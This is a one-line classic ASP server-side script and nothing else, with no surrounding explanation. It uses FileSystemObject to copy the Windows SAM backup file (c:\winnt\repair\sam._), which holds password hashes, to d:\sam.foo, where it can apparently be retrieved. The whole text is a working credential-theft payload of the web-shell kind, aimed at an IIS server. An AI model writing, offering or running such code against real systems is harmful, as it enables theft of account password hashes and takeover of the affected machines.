<% Set objFS=Server.CreateObject("Scripting.FileSystemObject") objFS.CopyFile "c:\winnt\repair\sam._", "d:\sam.foo" Set objFS=Nothing %>